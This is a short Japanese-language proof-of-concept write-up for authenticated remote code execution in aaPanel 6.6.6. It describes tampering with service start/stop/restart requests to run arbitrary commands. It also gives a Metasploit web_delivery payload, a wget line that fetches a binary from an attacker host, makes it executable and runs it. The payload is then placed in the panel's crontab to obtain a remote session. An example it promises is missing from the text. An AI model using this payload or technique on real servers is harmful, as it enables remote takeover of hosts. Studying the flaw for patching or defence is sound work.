
aapanel 6.6.6 - (認証済み)リモートコード実行
このPoCを作成するために、docker-composeを使用してソフトウェアをインストールしました。
ソフトウェアストアに移動し、設定フィールドの任意の行をクリックして、"start/stop/restart"をクリックしたときのリクエストをインターセプトし、リクエストを変更/編集して任意のコマンドを実行します。curlを使用した例は次のとおりです:
このPoCを作成するために、クリーンなUbuntu 20.04をインストールし、wgetとsudoをインストールして、次のスクリプトを実行しました: wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh
まず、web_deliveryオプションを設定します。これにより、ペイロードとリスナーが作成されます。
次に、それを実行します。
これにより、次のペイロードが生成されます:
wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown
次に、これをaapanelのcrontabメニューのscript contentにコピー&ペーストします。
あとはcrontabを実行して、セッションを待つだけです。
msfconsole -r aapanel.rcを実行し、ペイロードをscript contentセクションにコピー&ペーストして、セッションをお楽しみください。